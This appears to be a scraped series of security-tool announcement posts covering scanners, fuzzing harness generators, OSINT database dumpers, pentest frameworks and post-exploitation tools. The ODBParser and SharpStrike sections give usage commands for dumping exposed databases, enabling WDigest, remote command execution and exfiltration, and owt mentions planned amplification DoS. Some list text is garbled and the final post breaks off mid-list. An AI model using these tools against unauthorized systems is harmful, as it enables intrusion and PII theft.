The motivation for GoKart was to address this: could we create a scanner with significantly lower false positive rates than existing tools? Based on our experimentation the answer is yes. By leveraging source-to-sink tracing and SSA, GoKart is capable of tracking variable taint between variable assignments, significantly improving the accuracy of findings. Our focus is on usability: pragmatically, that means we have optimized our approaches to reduce false alarms.

For more information, please read our blog post.


Install

You can install GoKart locally by using any one of the options listed below.


Install with go install
$ go install github.com/praetorian-inc/[email protected]

Install a release binary
  1. Download the binary for your OS from the releases page.

  2. (OPTIONAL) Download the checksums.txt file to verify the integrity of the archive

# Check the checksum of the downloaded archive
$ shasum -a 256 gokart_${VERSION}_${ARCH}.tar.gz
b05c4d7895be260aa16336f29249c50b84897dab90e1221c9e96af9233751f22 gokart_${VERSION}_${ARCH}.tar.gz

$ cat gokart_${VERSION}_${ARCH}_checksums.txt | grep gokart_${VERSION}_${ARCH}.tar.gz
b05c4d7895be260aa16336f29249c50b84897dab90e1221c9e96af9233751f22 gokart_${VERSION}_${ARCH}.tar.gz
  1. Extract the downloaded archive
$ tar -xvf gokart_${VERSION}_${ARCH}.tar.gz
  1. Move the gokart binary into your path:
$ mv ./gokart /usr/local/bin/

Clone and build yourself
# clone the GoKart repo
$ git clone https://github.com/praetorian-inc/gokart.git

# navigate into the repo directory and build
$ cd gokart
$ go build

# Move the gokart binary into your path
$ mv ./gokart /usr/local/bin

Usage

Run GoKart on a Go module in the current directory
# running without a directory specified defaults to '.'
gokart scan <flags>

Scan a Go module in a different directory
gokart scan <directory> <flags> 

Get Help
gokart help

Getting Started - Scanning an Example App

You can follow the steps below to run GoKart on Go Test Bench, an intentionally vulnerable Go application from the Contrast Security team.

# Clone sample vulnerable application
git clone https://github.com/Contrast-Security-OSS/go-test-bench.git
gokart scan go-test-bench/

Output should show some identified vulnerabilities, each with a Vulnerable Function and Source of User Input identified.

To test some additional GoKart features, you can scan with the CLI flags suggested below.

# Use verbose flag to show full traces of these vulnerabilities
gokart scan go-test-bench/ -v

# Use globalsTainted flag to ignore whitelisted Sources
# may increase false positive results
gokart scan go-test-bench/ -v -g

# Use debug flag to display internal analysis information
# which is useful for development and debugging
gokart scan go-test-bench/ -d

# Output results in sarif format
gokart scan go-test-bench/ -s

# Output results to file
gokart scan go-test-bench/ -o gokart-go-test-bench.txt

# Output scarif results to file
gokart scan go-test-bench/ -o gokart-go-test-bench.txt -s

# Scan remote repository (private repos require proper authentication)
# Repository will be cloned locally, scanned and deleted afterwards
gokart scan -r github.com/ShiftLeftSecurity/shiftleft-go-demo -v

# Use remote scan and output flags together for seamless security reviews
gokart sca n -r github.com/ShiftLeftSecurity/shiftleft-go-demo -o gokart-shiftleft-go-demo.txt -v

# Use remote scan, output and sarif flags for frictionless integration into CI/CD
gokart scan -r github.com/ShiftLeftSecurity/shiftleft-go-demo -o gokart-shiftleft-go-demo.txt -s

To test out the extensibility of GoKart, you can modify the configuration file that GoKart uses to introduce a new vulnerable sink into analysis. There is a Test Sink analyzer defined in the included default config file at util/analyzers.yml. Modify util/analyzers.yml to remove the comments on the Test Sink analyzer and then direct GoKart to use the modified config file with the -i flag.

# Scan using modified analyzers.yml file and output full traces
gokart scan go-test-bench/ -v -i <path-to-gokart>/util/analyzers.yml

Output should now contain additional vulnerabilities, including new "Test Sink reachable by user input" vulnerabilities.


Run GoKart Tests

You can run the included tests with the following command, invoked from the GoKart root directory.

go test -v ./...


Autoharness - A Tool That Automatically Creates Fuzzing Harnesses Based On A Library

12 September 2021 at 20:30
By: Zion3R


AutoHarness is a tool that automatically generates fuzzing harnesses for you. This idea stems from a concurrent problem in fuzzing codebases today: large codebases have thousands of functions and pieces of code that can be embedded fairly deep into the library. It is very hard or sometimes even impossible for smart fuzzers to reach that codepath. Even for large fuzzing projects such as oss-fuzz, there are still parts of the codebase that are not covered in fuzzing. Hence, this program tries to alleviate this problem in some capacity as well as provide a tool that security researchers can use to initially test a code base. This program only supports code bases which are coded in C and C++.


Setup/Demonstration

This program utilizes llvm and clang for libfuzzer, Codeql for finding functions, and python for the general program. This program was tested on Ubuntu 20.04 with llvm 12 and python 3. Here is the initial setup.

sudo apt-get update;
sudo apt-get install python3 python3-pip llvm-12* clang-12 git;
pip3 install pandas lief subprocess os argparse ast;

Follow the installation procedure for Codeql on https://github.com/github/codeql. Make sure to install the CLI tools and the libraries. For my testing, I have stored both the tools and libraries under one folder. Finally, clone this repository or download a release. Here is the program's output after running on nginx with the multiple argument mode set. This is the command I used.

python3 harness.py -L /home/akshat/nginx-1.21.0/objs/ -C /home/akshat/codeql-h/ -M 1 -O /home/akshat/autoharness/ -D nginx -G 1 -Y 1 -F "-I /home/akshat/nginx-1.21.0/objs -I /home/akshat/nginx-1.21.0/src/core -I /home/akshat/nginx-1.21.0/src/event -I /home/akshat/nginx-1.21.0/src/http -I /home/akshat/nginx-1.21.0/src/mail -I /home/akshat/nginx-1.21.0/src/misc -I /home/akshat/nginx-1.21.0/src/os -I /home/akshat/nginx-1.21.0/src/stream -I /home/akshat/nginx-1.21.0/src/os/unix" -X ngx_config.h,ngx_core.h

Results: Β 

Β It is definitely possible to raise the success by further debugging the compilation and adding more header files and more. Note the nginx project does not have any shared objects after compiling. However, this program does have a feature that can convert PIE executables into shared libraries.


Planned Features (in order of progress)

  1. Struct Fuzzing

The current way implemented in the program to fuzz functions with multiple arguments is by using fuzzing data provider. There are some improvements to make in this integration; however, I believe I can incorporate this feature with data structures. A problem which I come across when coding this is with codeql and nested structs. It becomes especially hard without writing multiple queries which vary for every function. In short, this feature needs more work. I was also thinking about a simple solution using protobufs.


  1. Implementation Based Harness Creation

Using codeql, it is possible to use to generate a control flow graph that maps how the parameters in a function are initialized. Using that information, we can create a better harness. Another way is to look for implementations for the function that exist in the library and use that information to make an educated guess on an implementation of the function as a harness. The problems I currently have with this are generating the control flow graphs with codeql.


  1. Parallelized fuzzing/False Positive Detection

I can create a simple program that runs all the harnesses and picks up on any of the common false positives using ASAN. Also, I can create a new interface that runs all the harnesses at once and displays their statistics.


Contribution/Bugs

If you find any bugs with this program, please create an issue. I will try to come up with a fix. Also, if you have any ideas on any new features or how to implement performance upgrades or the current planned features, please create a pull request or an issue with the tag (contribution).


PSA

This tool generates some false positives. Please first analyze the crashes and see if it is valid bug or if it is just an implementation bug. Also, you can enable the debug mode if some functions are not compiling. This will help you understand if there are some header files that you are missing or any linkage issues. If the project you are working on does not have shared libraries but an executable, make sure to compile the executable in PIE form so that this program can convert it into a shared library.


References
  1. https://lief.quarkslab.com/doc/latest/tutorials/08_elf_bin2lib.html


ODBParser - OSINT Tool To Search, Parse And Dump Only The Open Elasticsearch And MongoDB Directories That Have The Data You Care About Exposing

12 September 2021 at 11:30
By: Zion3R


ODBParser is a tool to search for PII being exposed in open databases.

ONLY to be used to identify exposed PII and warn server owners of irresponsible database maintenance
OR to query databases you have permission to access!

PLEASE USE RESPONSIBLY


What is this?

Wrote this as wanted to create one-stop OSINT tool for searching, parsing and analyzing open databases in order to identify leakages of PII on third-party servers. Other tools seem to either only search for open databases or dump them once you've identified them and then will grab data indiscriminately. Grew from function or two into what's in this repo, so code isn't as clean and pretty as it could be.


Features

To identify open databases you can:

  • query Shodan and BinaryEdge using all possible parameters (filter by country, port number, whatever)
  • specify single IP address
  • load up file that has list of IP addresses
  • paste list of IP addresses from clipboard

Dumping options:

  • parses all databases/collections to identify data you specify
  • grab everything hosted on server
  • grab just one index/collection
  • Use ctrl+c to skip dumping certain index

Post-Processing:

  • convert JSON dumps to CSV
  • remove useless columns from CSV

Other features:

  • keeps track of all the IP addresses and databases you have queried along with info about each server.
  • maintains stats file with number of IP's you've queried, number of databases you've parsed and number of records you've dumped
  • convert JSON dumps you already have to CSV
  • for every database that has total number of records above your limit, script will create an entry in a special file along with 5 sample records so you can review and decide whether the database is worth grabbing
  • Default output is line-separated JSON file with a JSON object on each line. You can choose to have it output a "proper JSON" file by using the "properjson" flag
  • You can convert the files to CSV on the fly or you can convert only certain files after run is complete (I recommend latter). Converted JSON files will be moved to folder called "JSON backups" in same directory. NOTE: When converting to CSV, script drops exact duplicate rows and drops columns and rows where all values are NaN, because that's what I wanted to do. Feel free to edit function if you'd rather have exact copy of JSON file.
  • Windows ONLY If script pulls back huge number of indices that have field you care about, script will list names of the dbs, pause and give you ten seconds to decide whether you want to go ahead and pull all the data from every index as I've found if you get too many databases returned even after you've specified fields you want, there is a good chance data is fake or useless logs and you can usually tell from name whether either possibility is the case. If you don't act within 10 seconds, script will go ahead and dump every index.
  • as you may have noticed, lot of people have been scanning for MongoDB databases and holding them hostage, often changing name to something like "TO_RESTORE_EMAIL_XXXRESTORE.COM." The MongoDb scraper will ignore all databases and collections that have been pwned by checking name of DB/collection against list of strings that indicate pwnage
  • script is pretty verbose (maybe too verbose) but I like seeing what's going on. Feel free to silence print statements if you prefer.

Customization

See the odbconfig.py file to specify your parameters, because really name of the game is exposing the data YOU are interested in. I provided some examples in the config file. Play around with them!

You can:

  • specify what index or collection names you want to collect by specifying substrings in config file. For example, if have the term "client", script will pull index called "clients" or "client_data." I recommend you keep these lists blank as you never know what databases you care about will be called and instead specify the fields you care about.
  • specify what fields you care about: if you only want to grab ES indices that have "email" in a field name, e.g."user_emails", you can do that. If you want to make sure the index has at least 2 fields you care about, you can do that too. Or if you just want to grab everything no matter what fields are in there, you can do that too.
  • specify what indices you DON'T want e.g., system index names and others that are generally used for basic logging. Examples provided in config file.
  • override config and grab everything on a server
  • specify output (default is JSON, can choose CSV)
  • set minimum and maximum size database script will dump by default and you can set flag to override max docs on case by case basis.

Installation and Requirements
  • Clone or download to machine
  • Get API keys for Shodan and/or BinaryEdge
  • configure parameters in ODBconfig.py file
  • install requirements from file

I suggest creating virtual environment for ODBParser so have no issues with incorrect module versions. Note: Tested ONLY on Python 3.7.3 and on Windows 10.

PLEASE USE RESPONSIBLY


Next Steps and Known Issues
  • clean up code a bit more
  • multithread various processes.
  • expand to other db types
  • add other open directory search engines (Zoomeye, etc.)
  • unable to scroll past first page for certain ES instances due to way ES <2.0 works. Appreciate any help! Pretty sure fixed this. Open issue if get scrollid errors

Usage
    Examples: python ODBParser.py -cn US -p 8080 -t users --elastic --shodan --csv --limit 100
python ODBParser.py -ip 192.168.2:8080 --mongo --ignorelogs --nosizelimits

Damage to-date: 0 servers parsed | 0 databases dumped | 0 records pulled
_____________________________________________________________________________


optional arguments:
-h, --help show this help message and exit

Query Options:
--shodan, -sh Add this flag if using Shodan. Specify ES or MDB w/
flags.
--binary, -be Add this flag if using BinaryEdge. Specify ES or MDB
w/ flags.
--ip , -ip Query one server. Add port like so '192.165.2.1:8080'
or will use default ports for each db type. Add ES or
MDB flags to specify parser.
--file , -f Load line-separated IPs from file. Add port or will
assume default ports for each db type. Add ES or MDB
flags to specify parser.
--paste, -v Query line-separated IPs from clipboard. Add port or
will assume default ports for each db type, e.g. 9200
for ES. Add ES or MDB flags to specify parser.

Shodan/BinaryEdge Options:
--limit , -l Max number of results per query. Default is
500.
--port , -p Filter by port.
--country , -cn Filter by country (two-letter country code).
--terms , -t Enter any additional query terms you want here, e.g.
'users'

Dump Options:
--mongo, -mdb Use for IP, Shodan, BinaryEdge & Paste methods to
specify parser.
--elastic, -es Use for IP, Shodan, BinaryEdge & Paste me thods to
specify parser.
--properjson, -pj Add this flag if would like out put to be proper JSON
file. Default is one JSON string object per line.
--database , -db Specify database you want to grab. For MDB must be in
format format 'db:collection'. Use with IP arg & 'es'
or 'mdb' flag
--getall, -g Get all indices regardless of fields and
collection/index names (overrides selections in config
file).
--ignorelogs Connect to a server you've already checked out.
--nosizelimits, -n Dump index no matter how big it is. Default max doc
count is 800,000.
--csv Convert JSON dumps into CSV format on the fly. (Puts
JSON files in backup folder in case there is issue
with coversion)

CSV/Post-processing Options:
--convertToCSV , -c Convert JSON file or folder of JSON dumps to CSVs
after the fact. Enter full path or folder name in
current working directory
--dontflatten Use if run into memory issues converting JSON files to
CSV during post-processing.
--basic Use with --convertToCSV flag if your JSON dumps are
not true JSON files, but rather line separated JSON
objects that you got from other sources.
--dontclean, -dc Choose if want to keep useless data when convert to
CSV. See docs for more info.


Pollenisator - Collaborative Pentest Tool With Highly Customizable Tools

11 September 2021 at 20:30
By: Zion3R


Pollenisator is a tool aiming to assist pentesters and auditor automating the use of some tools/scripts and keep track of them.

  • Written in python 3
  • Provides a modelisation of "pentest objects" : Scope, Hosts, Ports, Commands, Tools etc.
  • Tools/scripts are separated into 4 categories : wave, Network/domain, IP, Port
  • Objects are stored in a NoSQL DB (Mongo)
  • Keep links between them to allow queries
  • Objects can be created through parsers / manual input
  • Business logic can be implemented (auto vuln referencing, item triggers, etc.)
  • Many tools/scripts launch conditions are availiable to avoid overloading the target or the scanner.
  • A GUI based on tcl/tk

Documentation

Everything is the wiki, including installation


Features
  • Register your own tools

    • Add command line options in your database.
    • Create your own light plugin to parse your tool output.
    • Use the objects Models to add, update or delete objects to the pentest inside plugins.
    • Limit the number of parallel execution of noisy/heavy tools
  • Define a recon/fingerprinting procedure with custom tools

    • Choose a period to start and stop the tools
    • Define your scope with domains and network IP ranges.
    • Custom settings to include new hosts in the scope
    • Keep results of all files generated through tools executions
    • Start the given docker to implement numerous tools for LAN and Web pentest
  • Collaborative pentests

    • Split the work between your machines by starting one worker by computer you want to use.
    • Tags ip or tools to show your team mates that you powned it.
    • Take notes on every object to keep trace of your discoveries
    • Follow tools status live
    • Search in all your objects properties with the fitler bar.
    • have a quick summary of all hosts and their open ports and check if some are powned.
  • Reporting

    • Create security defects on IPs and ports
    • Make your plugins create defects directly so you don't have to
    • Generate a Word report of security defects found. You can use your own template with extra work.
    • Generate a Powerpoint report of security defects found. You can use your own template with extra work.
  • Currently integrated tools

    • IP / port recon : Nmap (Quick nmaps followed by thorough scan)
    • Domain enumeration : Knockpy, Sublist3r, dig reverse, crtsh
    • Web : WhatWeb, Nikto, http methods, Dirsearch
    • LAN : Crackmapexec, eternalblue and bluekeep scan, smbmap, anonymous ftp, enum4linux
    • Unknown ports : amap, nmap scripts
    • Misc : ikescan, ssh_scan, openrelay

Roadmap
  • Change the architecture to an API based one
  • Get rid of Celery
  • Add flexibity for commands
  • Improve UX
  • Add more plugin and improve existing ones
  • Add real support for users / authenticated commands


Karta - Source Code Assisted Fast Binary Matching Plugin For IDA

11 September 2021 at 11:30
By: Zion3R


"Karta" (Russian for "Map") is an IDA Python plugin that identifies and matches open-sourced libraries in a given binary. The plugin uses a unique technique that enables it to support huge binaries (>200,000 functions), with almost no impact on the overall performance.

The matching algorithm is location-driven. This means that it's main focus is to locate the different compiled files, and match each of the file's functions based on their original order within the file. This way, the matching depends on K (number of functions in the open source) instead of N (size of the binary), gaining a significant performance boost as usually N >> K.

We believe that there are 3 main use cases for this IDA plugin:

  1. Identifying a list of used open sources (and their versions) when searching for a useful 1-Day
  2. Matching the symbols of supported open sources to help reverse engineer a malware
  3. Matching the symbols of supported open sources to help reverse engineer a binary / firmware when searching for 0-Days in proprietary code

Read The Docs

https://karta.readthedocs.io/


Installation (Python 3 & IDA >= 7.4)

For the latest versions, using Python 3, simply git clone the repository and run the setup.py install script. Python 3 is supported since versions v2.0.0 and above.


Installation (Python 2 & IDA < 7.4)

As of the release of IDA 7.4, Karta is only actively developed for IDA 7.4 or newer, and Python 3. Python 2 and older IDA versions are still supported using the release version v1.2.0, which is most probably going to be the last supported version due to python 2.X end of life.


Identifier

Karta's identifier is a smaller plugin that identifies the existence, and fingerprints the versions, of the existing (supported) open source libraries within the binary. No more need to reverse engineer the same open-source library again-and-again, simply run the identifier plugin and get a detailed list of the used open sources. Karta currently supports more than 10 open source libraries, including:

  • OpenSSL
  • Libpng
  • Libjpeg
  • NetSNMP
  • zlib
  • Etc.

Matcher

After identifying the used open sources, one can compile a .JSON configuration file for a specific library (libpng version 1.2.29 for instance). Once compiled, Karta will automatically attempt to match the functions (symbols) of the open source in the loaded binary. In addition, in case your open source used external functions (memcpy, fread, or zlib_inflate), Karta will also attempt to match those external functions as well.


Folder Structure
  • src: source directory for the plugin
  • configs: pre-supplied *.JSON configuration files (hoping the community will contribute more)
  • compilations: compilation tips for generating the configuration files, and lessons from past open sources
  • docs: sphinx documentation directory

Additional Reading

Credits

This project was developed by me (see contact details below) with help and support from my research group at Check Point (Check Point Research).


Contact (Updated)

This repository was developed and maintained by me, Eyal Itkin, during my years at Check Point Research. Sadly, with my departure of the research group, I will no longer be able to maintain this repository. This is mainly because of the long list of requirements for running all of the regression tests, and the IDA Pro versions that are involved in the process.

Please accept my sincere apology.

@EyalItkin



WWWGrep - OWASP Foundation Web Respository

10 September 2021 at 20:30
By: Zion3R


WWWGrep is a rapid search β€œgrepping” mechanism that examines HTML elements by type and permits focused (single), multiple (file based URLs) and recursive (with respect to root domain or not) searches to be performed. Header names and values may also be recursively searched in this manner. WWWGrep was designed to help both breakers and builders to quickly examine code bases under inspection, some use cases and examples are shown below.


Installation

git clone 
pip3 install -r requirements.txt
python3 wwwgrep.py <arguments and parameters>

Dependencies (pip3 install -r requirements.txt)

- Python 3.5+
- BeautifulSoup 4
- UrlLib.parse
- requests_html
- argparse
- requests
- re
- os.path

Breakers
  • Quickly locate login pages by searching for input fields named β€œusername” or β€œpassword” on a site an using a recursion flag
  • Quickly check headers for the use of specific technologies
  • Quickly locate cookies and JWT tokens by search response headers
  • Use with a proxy tool to automate recursion through a set links rapidly
  • Locate all input sinks on a page (or site) by search for input fields and parameter processing symbology
  • Locate all developer comments on a page to identify commented out code (or To Do’s)
  • Quickly test consistency of site controls implemented during recursion (headers, HSTS, CSP etc)
  • Quickly find vulnerable JavaScript code present in web pages
  • Identify API tokens and access keys present in page code

Builders
  • Quickly test multiple sites under management for the use of vulnerable code
  • Quickly test multiple sites under management for the use of vulnerable frameworks/technologies
  • Find sites which may share a common codebase to determine the impact of flaws/vulnerabilities
  • Find sites which share a common authentication token (header auth token)
  • Find sites which may contain developer comments for server hygiene purposes

Command line switches
wwwgrep.py [target/file] [search_string] [search params/criteria/recursion etc]
Search Inputs

search_string Specify the string to search for or alternatively β€œβ€
for all objects of type specified in search parameters

-t --target Specify a single URL as a target for the search
-f --file Specify a file containing a list of URLs to search

Recursion

-rr --recurse-root Limits URL recursion to the domain provided in the target
-ra --recurse-any Allows recursion to extend beyond the domain of the target

Matching Criteria

-i --ignore-case Performs case insensitive matching (default is to respect case)
-d --dedupe Allow duplicate findings per page (default is to de-duplicate findings)
-r --no-redirects Do not allow redirects (default is to allow redirects)
-b --no-base-url Omit the URL of the match from the output (default is to include the URL)
-x --regex Allows the use of RegEX matches (search_string is treated as a RegEX, default is off)
-e --separator Specify and output specifier (default is : )
-j --java-render Turns on JavaScript rendering of page objects and text (default is off)
-p --linked-js-on Turns on searching of linked (script src tags) Java Script (default is off)

Request Parameters

-ps --https-proxy Specify a proxy for the HTTPS protocol in https://<ip>:<port> format
-pp --http-proxy Specify a proxy for the HTTP protocol in http://<ip>:<port> format
-hu --user-agent Specify a string to use as the user agent in the request
-ha --auth-header Specify a bearer token or other auth string to use in the request header

Search Parameters

-s --all Search all page HTML and scripts for terms that match the search specification
-sr --relative Search page links that match the search specification as relative URLs
-sa --absolute Search page links that match the search specification as absolute URLs
-si --input-fields S earch page input fields that match the search specification
-ss --scripts Search scripts tags that match the search specification
-st --text Search visible text on the page that matches the search specification
-sc --comments Search comments on the page that match the search specification
-sm --meta Search in page metadata for matches to the search specification
-sf --hidden Search in hidden fields for specific matches to the search specification
-sh --header-name Search response headers for specific matches to the search specification
-sv --header-value Search response header values for specific matches to the search specification

Examples of use:

Find all input fields named login on a site recursively while not leaving the root domain without case sensitivity in the match

wwwgrep.py -t https://www.target.com -i -si β€œlogin” -rr

Find all comments containing the term β€œto do” on all pages in a site

wwwgrep.py -t https://www.target.com -i -sc β€œto do” -rr

Find all comments on a specific web page

wwwgrep.py -t https://www.target.com/some_page -i -sc β€œβ€

Find all hidden fields within a list of web applications contained in the file input.txt using site recursion

wwwgrep.py -f input.txt -sf β€œβ€ -rr



EDD - Enumerate Domain Data

10 September 2021 at 11:30
By: Zion3R


Enumerate Domain Data is designed to be similar to PowerView but in .NET. PowerView is essentially the ultimate domain enumeration tool, and we wanted a .NET implementation that we worked on ourselves. This tool was largely put together by viewing implementations of different functionality across a wide range of existing projects and combining them into EDD.


Usage

To use EDD, you just need to call the application, provide the function that you want to run (listed below) and provide any optional/required parameters used by the function.


Functions

The following functions can be used with the -f flag to specify the data you want to enumerate/action you want to take.


Forest/Domain Information
getdomainsid - Returns the domain sid (by default current domain if no domain is provided)
getforest - returns the name of the current forest
getforestdomains - returns the name of all domains in the current forest
convertsidtoname - Converts a SID to the corresponding group or domain name (use the -u option for providing the SID value)
getadcsservers - Get a list of servers running AD CS within the current domain

Computer Information
getdomaincomputers - Get a list of all computers in the domain
getdomaincontrollers - Gets a list of all domain controllers
getdomainshares - Get a list of all accessible domain shares

User Information
remote system getnetdomaingroupmember - Returns a list of all users in a domain group getdomainuser - Retrieves info about specific user (name, description, SID, Domain Groups) getnetsession - Returns a list of accounts with sessions on the targeted system getnetloggedon - Returns a list of accounts logged into the targeted system getuserswithspns - Returns a list of all domain accounts that have a SPN associated with them ">
getnetlocalgroupmember - Returns a list of all users in a local group on a remote system
getnetdomaingroupmember - Returns a list of all users in a domain group
getdomainuser - Retrieves info about specific user (name, description, SID, Domain Groups)
getnetsession - Returns a list of accounts with sessions on the targeted system
getnetloggedon - Returns a list of accounts logged into the targeted system
getuserswithspns - Returns a list of all domain accounts that have a SPN associated with them

Chained Information
finddomainprocess - Search for a specific process across all systems in the domain (requires admin access on remote systems)
finddomainuser - Searches the domain environment for a specified user or group and tries to find active sessions (default searches for Domain Admins)
findinterestingdomainsharefile - Searches the domain environment for all accessible shares. Once found, it parses all filenames for "interesting" strings
findwritableshares - Enumerates all shares in the domain and then checks to see if the current account can create a text file in the root level share, and one level deep.

References
PowerView - https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1
CSharp-Tools - https://github.com/RcoIl/CSharp-Tools
StackOverflow - Random questions (if this isn't somehow listed as a reference, we know we're forgetting it :))
SharpView - https://github.com/tevora-threat/SharpView


Owt - The Most Compact WiFi Auditing Tool That Works On Command Line Linux

9 September 2021 at 20:30
By: Zion3R

Β 


This tool compiles some necessary tools for wifi auditing in a unix bash script with a user friendly interface. The goal of owt is to have the smallest file size possible while still functioning at maximum proficiency.


Installation & Running the script
~ $ git clone https://github.com/clu3bot/OWT.git
~ $ cd owt
~ $ sudo bash owt.sh

Note: owt requires root privileges

Make sure to allow updates regularly


Usage

Detailed How-to of owt can be found here


Troubleshooting

Troubleshoot.sh will detect possible problems you may have with owt

~ $ cd owt
~ $ sudo bash troubleshoot.sh

owt Premium Edition

Dependencies
  • aircrack-ng
  • mdk3
  • xterm
  • macchanger
  • owt tool will prompt the user to download these dependencies if they arent installed.

In The Works
  • Expanding owt from being just for wireless network attacking. More information below.
  • Adding more advanced functionality to owt such as NTP amplification attacks to screw with NTP servers for dosing websites.
  • Adding AP tracking functionality and ability to save lists of common saved networks that devices have in the area. I.E if there is a starbucks near by you can track if starbucks is a common AP that phones in the area have as a saved network. This is useful for knowing which APs to spoof.
  • Adding a method of saving text or csv files of device names and mac-addresses on a newtwork.
  • Making a windows version of owt.
  • Major U.I changes
  • Fixing the "issue" where owt doesn't support use within Virtual Machines. Not priority as this is a pain in the ass but has been requested :)

History

owt Version History can be found here

Stable Releases Source Code can be found here


All Resources
  • Contact me here
  • Tutorial for owt here
  • owt wiki here
  • Updates/Versions history here
  • Help and Troubleshooting here

Legal Notice

This script is intended to be used on networks you own. Don't use this script maliciously. You are responsible for your own actions.



Graphw00F - GraphQL fingerprinting tool for GQL endpoints

9 September 2021 at 11:30
By: Zion3R

Credits to Nick Aleks for the logo!

How does it work?

graphw00f (inspired by wafw00f) is the GraphQL fingerprinting tool for GQL endpoints, it sends a mix of benign and malformed queries to determine the GraphQL engine running behind the scenes. graphw00f will provide insights into what security defences each technology provides out of the box, and whether they are on or off by default.

Specially crafted queries cause different GraphQL server implementations to respond uniquely to queries, mutations and subscriptions, this makes it trivial to fingerprint the backend engine and distinguish between the various GraphQL implementations. (CWE: CWE-200)


Detections

graphw00f currently attempts to discover the following GraphQL engines:

  • Graphene - Python
  • Ariadne - Python
  • Apollo - TypeScript
  • graphql-go - Go
  • gqlgen - Go
  • WPGraphQL - PHP
  • GraphQL API for Wordpress - PHP
  • Ruby - GraphQL
  • graphql-php - PHP
  • Hasura - Haskell
  • HyperGraphQL - Java
  • graphql-java - Java
  • Juniper - Rust
  • Sangria - Scala
  • Flutter - Dart
  • Diana.jl - Julia
  • Strawberry - Python
  • Tartiflette - Python

GraphQL Technologies Defence Matrices

Each fingerprinted technology (e.g. Graphene, Ariadne, ...) has an associated document (example for graphene) which covers the security defence mechanisms the specific technology supports to give a better idea how the implementation may be attacked.

| Field Suggestions | Query Depth Limit | Query Cost Analysis | Automatic Persisted Queries | Introspection      | Debug Mode | Batch Requests  |
|-------------------|-------------------|---------------------|-----------------------------|--------------------|------------|-----------------|
| On by Default | No Support | No Support | No Support | Enabled by Default | N/A | Off by Default |

Prerequisites
  • python3
  • requests

Installation

Clone Repository

git clone [email protected]:dolevf/graphw00f.git


Run graphw00f

python3 main.py -h

Usage: main.py -h

Options:
-h, --help show this help message and exit
-r, --noredirect Do not follow redirections given by 3xx responses
-t URL, --target=URL target url with the path
-o OUTPUT_FILE, --output-file=OUTPUT_FILE
Output results to a file (CSV)
-l, --list List all GraphQL technologies graphw00f is able to
detect
-v, --version Print out the current version and exit.

Example
python3 main.py -t http://127.0.0.1:5000/graphql

+-------------------+
| graphw00f |
+-------------------+
*** ***
** ***
** **
+--------------+ +--------------+
| Node X | | Node Y |
+--------------+ +--------------+
*** ***
** **
** **
+------------+
| Node Z |
+------------+

graphw00f - v1.0.0
The fingerprinting tool for GraphQL

[*] Checking if GraphQL is available at https://demo.hypergraphql.org:8484/graphql...
[*] Found GraphQL...
[*] Attempting to fingerprint...
[*] Discovered GraphQL Engine: (HyperGraphQL)
[!] Attack Surface Matrix: https://github.com/dolevf/graphw00f/blob/main/docs/hypergraphql.md
[!] Technologies: Java
[!] Homepage: https://www.hypergraphql.org
[*] Completed.

Support and Issues

Any issues with graphw00f such as false positives, inaccurate detections, bugs, etc. please create a GitHub issue with environment details.


Resources

Want to learn more about GraphQL? head over to my other project and hack GraphQL away: Damn Vulnerable GraphQL Application



SharpStrike - A Post Exploitation Tool Written In C# Uses Either CIM Or WMI To Query Remote Systems

8 September 2021 at 20:30
By: Zion3R


SharpStrike is a post-exploitation tool written in C# that uses either CIM or WMI to query remote systems. It can use provided credentials or the current user's session.

Note: Some commands will use PowerShell in combination with WMI, denoted with ** in the --show-commands command.


Introduction

SharpStrike is a C# rewrite and expansion on @Matt_Grandy_'s CIMplant and @christruncer's WMImplant.

SharpStrike allows you to gather data about a remote system, execute commands, exfil data, and more. The tool allows connections using Windows Management Instrumentation, WMI, or Common Interface Model, CIM ; well more accurately Windows Management Infrastructure, MI. CIMplant requires local administrator permissions on the target system.


Setup:

It's probably easiest to use the built version under Releases, just note that it is compiled in Debug mode. If you want to build the solution yourself, follow the steps below.

  1. Load SharpStrike.sln into Visual Studio
  2. Go to Build at the top and then Build Solution if no modifications are wanted

The Build will produce two versions of SharpStrike: GUI (WinForms) & Console application. Each version implements the same features.


Usage
Console Version:

SharpStrike.exe --help
SharpStrike.exe --show-commands
SharpStrike.exe --show-examples
SharpStrike.exe -c ls_domain_admins
SharpStrike.exe -c ls_domain_users_list
SharpStrike.exe -c cat -f "c:\users\user\desktop\file.txt" -s [remote IP address]
SharpStrike.exe -c cat -f "c:\users\user\desktop\file.txt" -s [remote IP address] -u [username] -d [domain] -p [password] -c
SharpStrike.exe -c command_exec -e "quser" -s [remote IP address] -u [username] -d [domain] -p [password]

GUI version:

show-commands
show-examples
ls_domain_admins
ls_domain_users_list
cat -f "c:\users\user\desktop\file.txt" -s [remote IP address]
cat -f "c:\users\user\desktop\file.txt" -s [remote IP address] -u [username] -d [domain] -p [password]
command_exec -e "quser" [remote IP address] -u [username] -d [domain] -p [password]

Functions

File Operations:
cat                          -  Reads the contents of a file
copy - Copies a file from one location to another
download** - Download a file from the targeted machine
ls - File/Directory listing of a specific directory
search - Search for a file on a user
upload** - Upload a file to the targeted machine

Lateral Movement Facilitation
command line command and receive the output. Run with nops flag to disable PowerShell disable_wdigest - Sets the registry value for UseLogonCredential to zero enable_wdigest - Adds registry value UseLogonCredential disable_winrm** - Disables WinRM on the targeted system enable_winrm** - Enables WinRM on the targeted system reg_mod - Modify the registry on the targeted machine reg_create - Create the registry value on the targeted machine reg_delete - Delete the registry on the targeted machine remote_posh** - Run a PowerShell script on a remote machine and receive the output sched_job - Not implimented due to the Win32_ScheduledJobs accessing an outdated API service_mod - Create, delete, or modify system services ls_domain_users*** - List domain users ls_domain_users_list*** - List domain users sAMAccountName ls_domain_users_email*** - List domain users email address ls_domain_groups*** - List domain user groups ls_domain_admins*** - List domain admin users ls_user_groups*** - List domain user with their associated groups ls_computers*** - List computers on current domain ">
command_exec**               -  Run a command line command and receive the output. Run with nops flag to disable PowerShell
disable_wdigest - Sets the registry value for UseLogonCredential to zero
enable_wdigest - Adds registry value UseLogonCredential
disable_winrm** - Disables WinRM on the targeted system
enable_winrm** - Enables WinRM on the targeted system
reg_mod - Modify the registry on the targeted machine
reg_create - Create the registry value on the targeted machine
reg_delete - Delete the registry on the targeted machine
remote_posh** - Run a PowerShell script on a remote machine and receive the output
sched_job - Not implimented due to the Win32_ScheduledJobs accessing an outdated API
service_mod - Create, delete, or modify system services
ls_do main_users*** - List domain users
ls_domain_users_list*** - List domain users sAMAccountName
